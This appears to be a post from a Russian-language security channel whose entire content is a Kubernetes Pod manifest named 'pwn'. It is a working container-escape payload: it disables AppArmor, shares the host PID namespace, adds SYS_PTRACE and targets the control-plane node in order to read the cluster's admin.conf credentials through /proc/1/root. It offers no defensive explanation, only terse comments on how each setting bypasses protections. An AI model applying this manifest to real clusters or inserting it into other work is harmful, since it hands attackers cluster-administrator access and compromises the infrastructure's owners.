Н
Нарыл
@naryl_sec1.5K подп.
3.1Kпросмотров
13 ноября 2023 г.
statsScore: 3.4K
apiVersion: v1 kind: Pod metadata: name: pwn annotations: container.apparmor.security.beta.kubernetes.io/pwned: unconfined #disable apparmor spec: hostPID: true #root PID namespace containers: - name: pwn image: ubuntu command: [ "cat", "/proc/1/root/etc/kubernetes/admin.conf" ] securityContext: capabilities: add: - SYS_PTRACE # SYS_PTRACE to bypass ptrace access mode checks nodeSelector: # land on master node node-role.kubernetes.io/control-plane: '' tolerations: # tolerate control-plane node tains - key: "" operator: "Exists" effect: ""
3.1K
просмотров
619
символов
Нет
эмодзи
Нет
медиа

Другие посты @naryl_sec

Все посты канала →
apiVersion: v1 kind: Pod metadata: name: pwn annotations: co — @naryl_sec | PostSniper